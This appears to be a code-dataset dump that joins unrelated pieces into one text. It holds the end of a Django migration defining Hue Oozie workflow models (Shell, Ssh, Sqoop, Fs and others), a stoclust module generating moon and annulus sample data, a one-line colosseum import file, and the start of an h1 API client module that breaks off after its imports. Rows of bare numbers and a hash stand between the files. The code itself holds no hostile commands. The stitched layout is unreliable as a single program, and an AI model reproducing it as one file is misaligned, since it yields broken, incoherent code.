(b'Indian/Antananarivo', b'Indian/Antananarivo'), (b'Indian/Chagos', b'Indian/Chagos'), (b'Indian/Christmas', b'Indian/Christmas'), (b'Indian/Cocos', b'Indian/Cocos'), (b'Indian/Comoro', b'Indian/Comoro'), (b'Indian/Kerguelen', b'Indian/Kerguelen'), (b'Indian/Mahe', b'Indian/Mahe'), (b'Indian/Maldives', b'Indian/Maldives'), (b'Indian/Mauritius', b'Indian/Mauritius'), (b'Indian/Mayotte', b'Indian/Mayotte'), (b'Indian/Reunion', b'Indian/Reunion'), (b'Iran', b'Iran'), (b'Israel', b'Israel'), (b'Jamaica', b'Jamaica'), (b'Japan', b'Japan'), (b'Kwajalein', b'Kwajalein'), (b'Libya', b'Libya'), (b'MET', b'MET'), (b'MST', b'MST'), (b'MST7MDT', b'MST7MDT'), (b'Mexico/BajaNorte', b'Mexico/BajaNorte'), (b'Mexico/BajaSur', b'Mexico/BajaSur'), (b'Mexico/General', b'Mexico/General'), (b'Mideast/Riyadh87', b'Mideast/Riyadh87'), (b'Mideast/Riyadh88', b'Mideast/Riyadh88'), (b'Mideast/Riyadh89', b'Mideast/Riyadh89'), (b'NZ', b'NZ'), (b'NZ-CHAT', b'NZ-CHAT'), (b'Navajo', b'Navajo'), (b'PRC', b'PRC'), (b'PST8PDT', b'PST8PDT'), (b'Pacific/Apia', b'Pacific/Apia'), (b'Pacific/Auckland', b'Pacific/Auckland'), (b'Pacific/Chatham', b'Pacific/Chatham'), (b'Pacific/Chuuk', b'Pacific/Chuuk'), (b'Pacific/Easter', b'Pacific/Easter'), (b'Pacific/Efate', b'Pacific/Efate'), (b'Pacific/Enderbury', b'Pacific/Enderbury'), (b'Pacific/Fakaofo', b'Pacific/Fakaofo'), (b'Pacific/Fiji', b'Pacific/Fiji'), (b'Pacific/Funafuti', b'Pacific/Funafuti'), (b'Pacific/Galapagos', b'Pacific/Galapagos'), (b'Pacific/Gambier', b'Pacific/Gambier'), (b'Pacific/Guadalcanal', b'Pacific/Guadalcanal'), (b'Pacific/Guam', b'Pacific/Guam'), (b'Pacific/Honolulu', b'Pacific/Honolulu'), (b'Pacific/Johnston', b'Pacific/Johnston'), (b'Pacific/Kiritimati', b'Pacific/Kiritimati'), (b'Pacific/Kosrae', b'Pacific/Kosrae'), (b'Pacific/Kwajalein', b'Pacific/Kwajalein'), (b'Pacific/Majuro', b'Pacific/Majuro'), (b'Pacific/Marquesas', b'Pacific/Marquesas'), (b'Pacific/Midway', b'Pacific/Midway'), (b'Pacific/Nauru', b'Pacific/Nauru'), (b'Pacific/Niue', b'Pacific/Niue'), (b'Pacific/Norfolk', b'Pacific/Norfolk'), (b'Pacific/Noumea', b'Pacific/Noumea'), (b'Pacific/Pago_Pago', b'Pacific/Pago_Pago'), (b'Pacific/Palau', b'Pacific/Palau'), (b'Pacific/Pitcairn', b'Pacific/Pitcairn'), (b'Pacific/Pohnpei', b'Pacific/Pohnpei'), (b'Pacific/Ponape', b'Pacific/Ponape'), (b'Pacific/Port_Moresby', b'Pacific/Port_Moresby'), (b'Pacific/Rarotonga', b'Pacific/Rarotonga'), (b'Pacific/Saipan', b'Pacific/Saipan'), (b'Pacific/Samoa', b'Pacific/Samoa'), (b'Pacific/Tahiti', b'Pacific/Tahiti'), (b'Pacific/Tarawa', b'Pacific/Tarawa'), (b'Pacific/Tongatapu', b'Pacific/Tongatapu'), (b'Pacific/Truk', b'Pacific/Truk'), (b'Pacific/Wake', b'Pacific/Wake'), (b'Pacific/Wallis', b'Pacific/Wallis'), (b'Pacific/Yap', b'Pacific/Yap'), (b'Poland', b'Poland'), (b'Portugal', b'Portugal'), (b'ROC', b'ROC'), (b'ROK', b'ROK'), (b'Singapore', b'Singapore'), (b'Turkey', b'Turkey'), (b'UCT', b'UCT'), (b'US/Alaska', b'US/Alaska'), (b'US/Aleutian', b'US/Aleutian'), (b'US/Arizona', b'US/Arizona'), (b'US/Central', b'US/Central'), (b'US/East-Indiana', b'US/East-Indiana'), (b'US/Eastern', b'US/Eastern'), (b'US/Hawaii', b'US/Hawaii'), (b'US/Indiana-Starke', b'US/Indiana-Starke'), (b'US/Michigan', b'US/Michigan'), (b'US/Mountain', b'US/Mountain'), (b'US/Pacific', b'US/Pacific'), (b'US/Pacific-New', b'US/Pacific-New'), (b'US/Samoa', b'US/Samoa'), (b'Universal', b'Universal'), (b'W-SU', b'W-SU'), (b'WET', b'WET'), (b'Zulu', b'Zulu')], default=b'America/Los_Angeles', help_text='The timezone of the coordinator. Only used for managing the daylight saving time changes when combining several coordinators.', max_length=24, verbose_name='Timezone')),
('start', models.DateTimeField(auto_now=True, help_text='When to start the first workflow.', verbose_name='Start')),
('end', models.DateTimeField(auto_now=True, help_text='When to start the last workflow.', verbose_name='End')),
('timeout', models.SmallIntegerField(blank=True, help_text='Number of minutes the coordinator action will be in WAITING or READY status before giving up on its execution.', null=True, verbose_name='Timeout')),
('concurrency', models.PositiveSmallIntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], help_text='The number of coordinator actions that are allowed to run concurrently (RUNNING status) before the coordinator engine starts throttling them.', null=True, verbose_name='Concurrency')),
('execution', models.CharField(blank=True, choices=[(b'FIFO', 'FIFO (oldest first) default'), (b'LIFO', 'LIFO (newest first)'), (b'LAST_ONLY', 'LAST_ONLY (discards all older materializations)')], help_text="Execution strategy of its coordinator actions when there is backlog of coordinator actions in the coordinator engine. The different execution strategies are 'oldest first', 'newest first' and 'last one only'. A backlog normally happens because of delayed input data, concurrency control or because manual re-runs of coordinator jobs.", max_length=10, null=True, verbose_name='Execution')),
('throttle', models.PositiveSmallIntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], help_text='The materialization or creation throttle value for its coordinator actions. Number of maximum coordinator actions that are allowed to be in WAITING state concurrently.', null=True, verbose_name='Throttle')),
('job_properties', models.TextField(default=b'[]', help_text='Additional properties to transmit to the workflow, e.g. limit=100, and EL functions, e.g. username=${coord:user()}', verbose_name='Workflow properties')),
],
bases=('oozie.job',),
),
migrations.CreateModel(
name='Decision',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='DecisionEnd',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='DistCp',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('params', models.TextField(default=b'[]', help_text='The arguments of the Distcp command. Put options first, then source paths, then destination path.', verbose_name='Arguments')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete then to create before starting the application. This should be used exclusively for directory cleanup', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Email',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('to', models.TextField(default=b'', help_text='Comma-separated values.', verbose_name='TO addresses')),
('cc', models.TextField(blank=True, default=b'', help_text='Comma-separated values.', verbose_name='CC addresses (optional)')),
('subject', models.TextField(default=b'', help_text='Plain-text.', verbose_name='Subject')),
('body', models.TextField(default=b'', help_text='Plain-text.', verbose_name='Body')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='End',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Fork',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Fs',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('deletes', models.TextField(blank=True, default=b'[]', help_text='Delete the specified path, if it is a directory it deletes recursively all its content and then deletes the directory.', verbose_name='Delete path')),
('mkdirs', models.TextField(blank=True, default=b'[]', help_text='Create the specified directory, it creates all missing directories in the path. If the directory already exist it does a no-op.', verbose_name='Create directory')),
('moves', models.TextField(blank=True, default=b'[]', help_text='Move a file or directory to another path.', verbose_name='Move file')),
('chmods', models.TextField(blank=True, default=b'[]', help_text='Change the permissions for the specified path. Permissions can be specified using the Unix Symbolic representation (e.g. -rwxrw-rw-) or an octal representation (755).', verbose_name='Change permissions')),
('touchzs', models.TextField(blank=True, default=b'[]', help_text='Creates a zero length file in the specified path if none exists or touch it.', verbose_name='Create or touch a file')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Generic',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('xml', models.TextField(default=b'', help_text='This will be inserted verbatim in the action <action name="email">...</action>. E.g. all the XML content like <email><cc>hue@hue.org</cc></email> will be inserted into the action and produce <action name="email"><email><cc>hue@hue.org</cc></email><ok/><error/></action>', verbose_name='XML of the custom action')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Hive',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('script_path', models.CharField(help_text='Script name or path to the Hive script. E.g. my_script.sql.', max_length=256, verbose_name='Script name')),
('params', models.TextField(default=b'[]', help_text='The Hive parameters of the script. E.g. N=5, INPUT=${inputDir}', verbose_name='Parameters')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete, then create, before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'hive-config.xml', help_text='Refer to a Hive hive-config.xml file bundled in the workflow deployment directory. Pick a name different than hive-site.xml.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Java',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('jar_path', models.CharField(help_text='Name or path to the Java jar file on HDFS. E.g. examples.jar.', max_length=512, verbose_name='Jar name')),
('main_class', models.CharField(help_text='Full name of the Java class. E.g. org.apache.hadoop.examples.Grep', max_length=256, verbose_name='Main class')),
('args', models.TextField(blank=True, help_text='Arguments of the main method. The value of each arg element is considered a single argument and they are passed to the main method in the same order.', verbose_name='Arguments')),
('java_opts', models.CharField(blank=True, help_text='Command-line parameters used to start the JVM that will execute the Java application. Using this element is equivalent to using the mapred.child.java.opts configuration property. E.g. -Dexample-property=hue', max_length=256, verbose_name='Java options')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete and then to create before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
('capture_output', models.BooleanField(default=False, help_text='Capture output of the stdout of the Java command execution. The Java command output must be in Java Properties file format and it must not exceed 2KB. From within the workflow definition, the output of an Java action node is accessible via the String action:output(String node, String key) function', verbose_name='Capture output')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Join',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Kill',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('message', models.CharField(default=b'Action failed, error message[${wf:errorMessage(wf:lastErrorNode())}]', max_length=256)),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Mapreduce',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('jar_path', models.CharField(help_text='Name or path to the MapReduce jar file on HDFS. E.g. examples.jar.', max_length=512, verbose_name='Jar name')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete and then to create before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Pig',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('script_path', models.CharField(help_text='Script name or path to the Pig script. E.g. my_script.pig.', max_length=256, verbose_name='Script name')),
('params', models.TextField(default=b'[]', help_text='The Pig parameters of the script. e.g. "-param", "INPUT=${inputDir}"', verbose_name='Parameters')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete and then to create before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Shell',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('command', models.CharField(help_text='The path of the Shell command to execute.', max_length=256, verbose_name='Shell command')),
('params', models.TextField(default=b'[]', help_text='The arguments of Shell command can then be specified using one or more argument element.', verbose_name='Arguments')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete then to create before starting the application. This should be used exclusively for directory cleanup', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
('capture_output', models.BooleanField(default=False, help_text='Capture output of the stdout of the Shell command execution. The Shell command output must be in Java Properties file format and it must not exceed 2KB. From within the workflow definition, the output of an Shell action node is accessible via the String action:output(String node, String key) function', verbose_name='Capture output')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Sqoop',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('script_path', models.TextField(blank=True, default=b'', help_text='The full Sqoop command. Either put it here or split it by spaces and insert the parts as multiple parameters below.', verbose_name='Command')),
('params', models.TextField(default=b'[]', help_text='If no command is specified, split the command by spaces and insert the Sqoop parameters here e.g. import, --connect, jdbc:hsqldb:file:db.hsqldb, ...', verbose_name='Parameters')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete then to create before starting the application. This should be used exclusively for directory cleanup', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Ssh',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('user', models.CharField(help_text='User executing the shell command.', max_length=64, verbose_name='User')),
('host', models.CharField(help_text='Where the shell will be executed.', max_length=256, verbose_name='Host')),
('command', models.CharField(help_text='The command that will be executed.', max_length=256, verbose_name='Ssh command')),
('params', models.TextField(default=b'[]', help_text='The arguments of the Ssh command.', verbose_name='Arguments')),
('capture_output', models.BooleanField(default=False, help_text='Capture output of the stdout of the Ssh command execution. The Ssh command output must be in Java properties file format and it must not exceed 2KB. From within the workflow definition, the output of an Ssh action node is accessible via the String action:output(String node, String key) function', verbose_name='Capture output')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Start',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Streaming',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('mapper', models.CharField(help_text='The executable/script to be used as mapper.', max_length=512, verbose_name='Mapper')),
('reducer', models.CharField(help_text='The executable/script to be used as reducer.', max_length=512, verbose_name='Reducer')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='SubWorkflow',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('propagate_configuration', models.BooleanField(default=True, help_text='If the workflow job configuration should be propagated to the child workflow.', verbose_name='Propagate configuration')),
('job_properties', models.TextField(default=b'[]', help_text='Can be used to specify the job properties that are required to run the child workflow job.', verbose_name='Hadoop job properties')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Workflow',
fields=[
('job_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Job')),
('is_single', models.BooleanField(default=False)),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
('job_properties', models.TextField(default=b'[]', help_text='Job configuration properties used by all the actions of the workflow (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('managed', models.BooleanField(default=True)),
('end', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='end_workflow', to='oozie.End')),
('start', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='start_workflow', to='oozie.Start')),
],
bases=('oozie.job',),
),
]
| 213.727494
| 24,420
| 0.67026
| 12,833
| 87,842
| 4.526689
| 0.087041
| 0.090616
| 0.013978
| 0.01625
| 0.900363
| 0.890568
| 0.879775
| 0.876039
| 0.864265
| 0.854074
| 0
| 0.018812
| 0.124337
| 87,842
| 410
| 24,421
| 214.24878
| 0.736401
| 0.000751
| 0
| 0.641791
| 1
| 0.094527
| 0.562029
| 0.056464
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.002488
| 0.014925
| 0
| 0.024876
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce5d0d2cb8340241d5663a853cab84c4e71e1fdb
| 1,742
|
py
|
Python
|
stoclust/examples.py
|
samlikesphysics/stoclust
|
488623fe093ce9b79e5cd2561f0535acf95463b6
|
[
"MIT"
] | null | null | null |
stoclust/examples.py
|
samlikesphysics/stoclust
|
488623fe093ce9b79e5cd2561f0535acf95463b6
|
[
"MIT"
] | null | null | null |
stoclust/examples.py
|
samlikesphysics/stoclust
|
488623fe093ce9b79e5cd2561f0535acf95463b6
|
[
"MIT"
] | null | null | null |
"""
stoclust.ensemble
Contains functions for generating example data.
Functions
---------
gen_moon(rad=1.0,occ=0.5,num_samples=100):
Generates random two-dimensional vectors,
arranged in a crescent moon shape.
gen_disk(rad1=1.0,rad2=2.0,num_samples=100):
Generates random two-dimensional vectors,
arranged in an annulus.
"""
import numpy as _np
def gen_moon(rad=1.0,occ=0.5,num_samples=100):
"""
Generates random two-dimensional vectors, arranged in a crescent moon shape.
The shape is described by a circle of radius rad partially occluded by a circle of the same radius,
with the degree of overlap (or occultation) given by occ.
"""
sampled = 0
samples = _np.zeros([num_samples,2])
while sampled < num_samples:
#print(samples)
r = _np.sqrt(_np.random.rand())*rad
theta = _np.random.rand()*2*_np.pi
x = r*_np.cos(theta)
y = r*_np.sin(theta)
if _np.sqrt((x+occ)**2+y**2)>rad:
samples[sampled,0] = x
samples[sampled,1] = y
sampled += 1
return samples
def gen_disk(rad1=1.0,rad2=2.0,num_samples=100):
"""
Generates random two-dimensional vectors, arranged in an annulus.
The shape is described by a circle of radius rad2 with a middle circle of radius rad1 subtracted from the middle.
"""
sampled = 0
samples = _np.zeros([num_samples,2])
while sampled < num_samples:
#print(samples)
r = _np.sqrt(_np.random.rand())*rad2
theta = _np.random.rand()*2*_np.pi
x = r*_np.cos(theta)
y = r*_np.sin(theta)
if r>rad1:
samples[sampled,0] = x
samples[sampled,1] = y
sampled += 1
return samples
| 29.525424
| 117
| 0.629162
| 261
| 1,742
| 4.091954
| 0.279693
| 0.074906
| 0.048689
| 0.082397
| 0.756554
| 0.756554
| 0.756554
| 0.756554
| 0.756554
| 0.689139
| 0
| 0.038551
| 0.255454
| 1,742
| 58
| 118
| 30.034483
| 0.784888
| 0.448909
| 0
| 0.740741
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce8ece8db0ea2f14d6bba312b20db3cbd442dbeb
| 112
|
py
|
Python
|
colosseum/mdps/taxi/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/taxi/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/taxi/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
from colosseum.mdps.taxi.continuous import TaxiContinuous
from colosseum.mdps.taxi.episodic import TaxiEpisodic
| 37.333333
| 57
| 0.875
| 14
| 112
| 7
| 0.642857
| 0.265306
| 0.346939
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 112
| 2
| 58
| 56
| 0.942308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0c83b18428768dbc68cbe5c4c52d97022a467d5a
| 151,640
|
py
|
Python
|
h1/api/iam_organisation_api.py
|
hyperonecom/h1-client-python
|
4ce355852ba3120ec1b8f509ab5894a5c08da730
|
[
"MIT"
] | null | null | null |
h1/api/iam_organisation_api.py
|
hyperonecom/h1-client-python
|
4ce355852ba3120ec1b8f509ab5894a5c08da730
|
[
"MIT"
] | null | null | null |
h1/api/iam_organisation_api.py
|
hyperonecom/h1-client-python
|
4ce355852ba3120ec1b8f509ab5894a5c08da730
|
[
"MIT"
] | null | null | null |
"""
HyperOne
HyperOne API # noqa: E501
The version of the OpenAPI document: 0.1.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from h1.api_client import ApiClient, Endpoint as _Endpoint
from h1.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from h1.model.billing import Billing
from h1.model.event import Event
from h1.model.iam_organisation_create import IamOrganisationCreate
from h1.model.iam_organisation_invitation_accept import IamOrganisationInvitationAccept
from h1.model.iam_organisation_ownership_create import IamOrganisationOwnershipCreate
from h1.model.iam_organisation_payment_allocate import IamOrganisationPaymentAllocate
from h1.model.iam_organisation_proforma_create import IamOrganisationProformaCreate
from h1.model.iam_organisation_transfer_accept import IamOrganisationTransferAccept
from h1.model.iam_organisation_update import IamOrganisationUpdate
from h1.model.inline_response400 import InlineResponse400
from h1.model.invitation import Invitation
from h1.model.invoice import Invoice
